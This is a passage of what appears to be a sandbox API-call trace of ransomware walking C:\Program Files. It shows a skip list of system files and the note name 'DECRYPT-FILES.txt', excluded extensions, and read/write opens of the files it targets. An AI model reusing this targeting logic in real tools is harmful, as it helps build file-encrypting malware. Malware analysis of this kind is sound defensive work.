ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xa6c8e3e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xa6c8e3e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0071.413] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0071.413] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0071.413] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0071.413] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0071.413] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0071.413] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0071.413] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0071.414] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0071.414] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0071.414] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0071.414] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.414] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0071.414] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0071.414] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0071.414] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0071.414] lstrlenW (lpString="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned 59 [0071.414] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0071.414] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\" [0071.414] lstrcatW (in: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\jkbimi8.tmp") returned="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\jkbimi8.tmp" [0071.414] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0071.414] CreateFileW (lpFileName="C:\\Program Files\\Microsoft SQL Server Compact Edition\\v3.5\\jkbimi8.tmp" (normalized: "c:\\program files\\microsoft sql server compact edition\\v3.5\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0071.414] CloseHandle (hObject=0x0) returned 0 [0071.414] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0071.414] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x8b840, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceca35.dll", cAlternateFileName="SQLCEC~1.DLL")) returned 1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="autorun.inf") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="boot.ini") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="desktop.ini") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="ntuser.dat") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="iconcache.db") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="bootsect.bak") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="ntuser.dat.log") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="thumbs.db") returned -1 [0071.415] lstrcmpiW (lpString1="sqlceca35.dll", lpString2="Bootfont.bin") returned 1 [0071.415] lstrlenW (lpString="sqlceca35.dll") returned 13 [0071.415] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0071.415] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0071.415] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0071.415] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0071.415] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x1d040, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcecompact35.dll", cAlternateFileName="SQLCEC~2.DLL")) returned 1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="autorun.inf") returned 1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="boot.ini") returned 1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="desktop.ini") returned 1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="ntuser.dat") returned 1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="iconcache.db") returned 1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="bootsect.bak") returned 1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="ntuser.dat.log") returned 1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="thumbs.db") returned -1 [0071.415] lstrcmpiW (lpString1="sqlcecompact35.dll", lpString2="Bootfont.bin") returned 1 [0071.415] lstrlenW (lpString="sqlcecompact35.dll") returned 18 [0071.415] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0071.415] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0071.415] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0071.415] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0071.415] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab6f770, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x24440, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceer35EN.dll", cAlternateFileName="SQLCEE~1.DLL")) returned 1 [0071.415] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="autorun.inf") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="boot.ini") returned 1 [0071.415] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="desktop.ini") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="ntuser.dat") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="iconcache.db") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="bootsect.bak") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="ntuser.dat.log") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="thumbs.db") returned -1 [0071.416] lstrcmpiW (lpString1="sqlceer35EN.dll", lpString2="Bootfont.bin") returned 1 [0071.416] lstrlenW (lpString="sqlceer35EN.dll") returned 15 [0071.416] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0071.416] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0071.416] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0071.416] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0071.416] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5ab958d0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x15a40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceme35.dll", cAlternateFileName="SQLCEM~1.DLL")) returned 1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="autorun.inf") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="boot.ini") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="desktop.ini") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="ntuser.dat") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="iconcache.db") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="bootsect.bak") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="ntuser.dat.log") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="thumbs.db") returned -1 [0071.416] lstrcmpiW (lpString1="sqlceme35.dll", lpString2="Bootfont.bin") returned 1 [0071.416] lstrlenW (lpString="sqlceme35.dll") returned 13 [0071.416] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0071.416] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0071.416] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0071.416] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0071.416] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdd805600, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdd805600, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x3fa40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceoledb35.dll", cAlternateFileName="SQLCEO~1.DLL")) returned 1 [0071.416] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="autorun.inf") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="boot.ini") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="desktop.ini") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="ntuser.dat") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="iconcache.db") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="bootsect.bak") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="ntuser.dat.log") returned 1 [0071.416] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="thumbs.db") returned -1 [0071.417] lstrcmpiW (lpString1="sqlceoledb35.dll", lpString2="Bootfont.bin") returned 1 [0071.417] lstrlenW (lpString="sqlceoledb35.dll") returned 16 [0071.417] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0071.417] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0071.417] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0071.417] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0071.417] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x6d3caa70, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x114e40, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlceqp35.dll", cAlternateFileName="SQLCEQ~1.DLL")) returned 1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="autorun.inf") returned 1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="boot.ini") returned 1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="desktop.ini") returned 1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="ntuser.dat") returned 1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="iconcache.db") returned 1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="bootsect.bak") returned 1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="ntuser.dat.log") returned 1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="thumbs.db") returned -1 [0071.417] lstrcmpiW (lpString1="sqlceqp35.dll", lpString2="Bootfont.bin") returned 1 [0071.417] lstrlenW (lpString="sqlceqp35.dll") returned 13 [0071.417] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0071.417] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0071.417] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0071.417] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0071.417] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="DECRYPT-FILES.txt") returned 1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="autorun.inf") returned 1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="boot.ini") returned 1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="desktop.ini") returned 1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="ntuser.dat") returned 1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="iconcache.db") returned 1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="bootsect.bak") returned 1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="ntuser.dat.log") returned 1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="thumbs.db") returned -1 [0071.417] lstrcmpiW (lpString1="sqlcese35.dll", lpString2="Bootfont.bin") returned 1 [0071.417] lstrlenW (lpString="sqlcese35.dll") returned 13 [0071.417] lstrcmpiW (lpString1="dll", lpString2="lnk") returned -1 [0071.417] lstrcmpiW (lpString1="dll", lpString2="exe") returned -1 [0071.417] lstrcmpiW (lpString1="dll", lpString2="sys") returned -1 [0071.418] lstrcmpiW (lpString1="dll", lpString2="dll") returned 0 [0071.418] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdeb18300, ftCreationTime.dwHighDateTime=0x1c8d68c, ftLastAccessTime.dwLowDateTime=0x5abbba30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xdeb18300, ftLastWriteTime.dwHighDateTime=0x1c8d68c, nFileSizeHigh=0x0, nFileSizeLow=0x9d640, dwReserved0=0x0, dwReserved1=0x0, cFileName="sqlcese35.dll", cAlternateFileName="SQLCES~1.DLL")) returned 0 [0071.418] FindClose (in: hFindFile=0x5f8b98 | out: hFindFile=0x5f8b98) returned 1 [0071.418] CloseHandle (hObject=0x430) returned 1 [0071.418] FindNextFileW (in: hFindFile=0x5f8c18, lpFindFileData=0x3f2f3cc | out: lpFindFileData=0x3f2f3cc*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e54b70, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x6d3a4910, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x6d3a4910, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="v3.5\\", cAlternateFileName="")) returned 0 [0071.418] FindClose (in: hFindFile=0x5f8c18 | out: hFindFile=0x5f8c18) returned 1 [0071.418] CloseHandle (hObject=0x420) returned 1 [0071.418] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50e7acd0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x50e7acd0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x50e7acd0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Sync Framework", cAlternateFileName="MICROS~4")) returned 1 [0071.418] lstrcmpW (lpString1="Microsoft Sync Framework", lpString2=".") returned 1 [0071.418] lstrcmpW (lpString1="Microsoft Sync Framework", lpString2="..") returned 1 [0071.418] lstrcatW (in: lpString1="Microsoft Sync Framework", lpString2="\\" | out: lpString1="Microsoft Sync Framework\\") returned="Microsoft Sync Framework\\" [0071.418] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Sync Framework\\" | out: lpString1="C:\\Program Files\\Microsoft Sync Framework\\") returned="C:\\Program Files\\Microsoft Sync Framework\\" [0071.418] StrStrW (lpFirst="C:\\Program Files\\Microsoft Sync Framework\\", lpSrch="SQL") returned 0x0 [0071.418] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x594863b0, ftCreationTime.dwHighDateTime=0x1d301bf, ftLastAccessTime.dwLowDateTime=0x594863b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x594863b0, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft Synchronization Services", cAlternateFileName="MID7C0~1")) returned 1 [0071.418] lstrcmpW (lpString1="Microsoft Synchronization Services", lpString2=".") returned 1 [0071.418] lstrcmpW (lpString1="Microsoft Synchronization Services", lpString2="..") returned 1 [0071.418] lstrcatW (in: lpString1="Microsoft Synchronization Services", lpString2="\\" | out: lpString1="Microsoft Synchronization Services\\") returned="Microsoft Synchronization Services\\" [0071.418] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Microsoft Synchronization Services\\" | out: lpString1="C:\\Program Files\\Microsoft Synchronization Services\\") returned="C:\\Program Files\\Microsoft Synchronization Services\\" [0071.418] StrStrW (lpFirst="C:\\Program Files\\Microsoft Synchronization Services\\", lpSrch="SQL") returned 0x0 [0071.418] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x886a52d0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x886a52d0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSBuild", cAlternateFileName="")) returned 1 [0071.418] lstrcmpW (lpString1="MSBuild", lpString2=".") returned 1 [0071.418] lstrcmpW (lpString1="MSBuild", lpString2="..") returned 1 [0071.418] lstrcatW (in: lpString1="MSBuild", lpString2="\\" | out: lpString1="MSBuild\\") returned="MSBuild\\" [0071.419] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="MSBuild\\" | out: lpString1="C:\\Program Files\\MSBuild\\") returned="C:\\Program Files\\MSBuild\\" [0071.419] StrStrW (lpFirst="C:\\Program Files\\MSBuild\\", lpSrch="SQL") returned 0x0 [0071.419] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8867f170, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8867f170, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Reference Assemblies", cAlternateFileName="REFERE~1")) returned 1 [0071.419] lstrcmpW (lpString1="Reference Assemblies", lpString2=".") returned 1 [0071.419] lstrcmpW (lpString1="Reference Assemblies", lpString2="..") returned 1 [0071.419] lstrcatW (in: lpString1="Reference Assemblies", lpString2="\\" | out: lpString1="Reference Assemblies\\") returned="Reference Assemblies\\" [0071.419] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Reference Assemblies\\" | out: lpString1="C:\\Program Files\\Reference Assemblies\\") returned="C:\\Program Files\\Reference Assemblies\\" [0071.419] StrStrW (lpFirst="C:\\Program Files\\Reference Assemblies\\", lpSrch="SQL") returned 0x0 [0071.419] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x12, ftCreationTime.dwLowDateTime=0x4232b3dd, ftCreationTime.dwHighDateTime=0x1ca0441, ftLastAccessTime.dwLowDateTime=0x4232b3dd, ftLastAccessTime.dwHighDateTime=0x1ca0441, ftLastWriteTime.dwLowDateTime=0x4232b3dd, ftLastWriteTime.dwHighDateTime=0x1ca0441, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Uninstall Information", cAlternateFileName="UNINST~1")) returned 1 [0071.419] lstrcmpW (lpString1="Uninstall Information", lpString2=".") returned 1 [0071.419] lstrcmpW (lpString1="Uninstall Information", lpString2="..") returned 1 [0071.419] lstrcatW (in: lpString1="Uninstall Information", lpString2="\\" | out: lpString1="Uninstall Information\\") returned="Uninstall Information\\" [0071.419] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Uninstall Information\\" | out: lpString1="C:\\Program Files\\Uninstall Information\\") returned="C:\\Program Files\\Uninstall Information\\" [0071.419] StrStrW (lpFirst="C:\\Program Files\\Uninstall Information\\", lpSrch="SQL") returned 0x0 [0071.419] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x8827ac50, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8827ac50, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Defender", cAlternateFileName="WINDOW~3")) returned 1 [0071.419] lstrcmpW (lpString1="Windows Defender", lpString2=".") returned 1 [0071.419] lstrcmpW (lpString1="Windows Defender", lpString2="..") returned 1 [0071.419] lstrcatW (in: lpString1="Windows Defender", lpString2="\\" | out: lpString1="Windows Defender\\") returned="Windows Defender\\" [0071.419] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Defender\\" | out: lpString1="C:\\Program Files\\Windows Defender\\") returned="C:\\Program Files\\Windows Defender\\" [0071.419] StrStrW (lpFirst="C:\\Program Files\\Windows Defender\\", lpSrch="SQL") returned 0x0 [0071.419] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x9e177d26, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0x8867f170, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0x8867f170, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Journal", cAlternateFileName="WI0FCF~1")) returned 1 [0071.419] lstrcmpW (lpString1="Windows Journal", lpString2=".") returned 1 [0071.419] lstrcmpW (lpString1="Windows Journal", lpString2="..") returned 1 [0071.419] lstrcatW (in: lpString1="Windows Journal", lpString2="\\" | out: lpString1="Windows Journal\\") returned="Windows Journal\\" [0071.419] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Journal\\" | out: lpString1="C:\\Program Files\\Windows Journal\\") returned="C:\\Program Files\\Windows Journal\\" [0071.419] StrStrW (lpFirst="C:\\Program Files\\Windows Journal\\", lpSrch="SQL") returned 0x0 [0071.419] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd885082, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x1eb25fda, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1eb25fda, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Mail", cAlternateFileName="WINDOW~1")) returned 1 [0071.419] lstrcmpW (lpString1="Windows Mail", lpString2=".") returned 1 [0071.419] lstrcmpW (lpString1="Windows Mail", lpString2="..") returned 1 [0071.419] lstrcatW (in: lpString1="Windows Mail", lpString2="\\" | out: lpString1="Windows Mail\\") returned="Windows Mail\\" [0071.419] lstrcatW (in: lpString1="C:\\Program Files\\", lpString2="Windows Mail\\" | out: lpString1="C:\\Program Files\\Windows Mail\\") returned="C:\\Program Files\\Windows Mail\\" [0071.419] StrStrW (lpFirst="C:\\Program Files\\Windows Mail\\", lpSrch="SQL") returned 0x0 [0071.419] FindNextFileW (in: hFindFile=0x5f8bd8, lpFindFileData=0x3f2f648 | out: lpFindFileData=0x3f2f648*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80020c30, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1ead9a68, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1ead9a68, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows Media Player", cAlternateFileName="WI54FB~1")) returned 1 [0071.419] lstrcmpW (lpString1="Windows Media Player", lpString2=".") returned 1 [0071.420] lstrcmpW (lpString1="Windows Media Player", lpString2="..") returned 1 [0071.420] lstrcatW (in: lpString1="Windows Media Player", lpString2="\\" | out: lpString1="Windows Media Player\\") returned="Windows Media Player\\" [0071.420] lstrcatW (in: lpString1="C:\\Program Files\\", 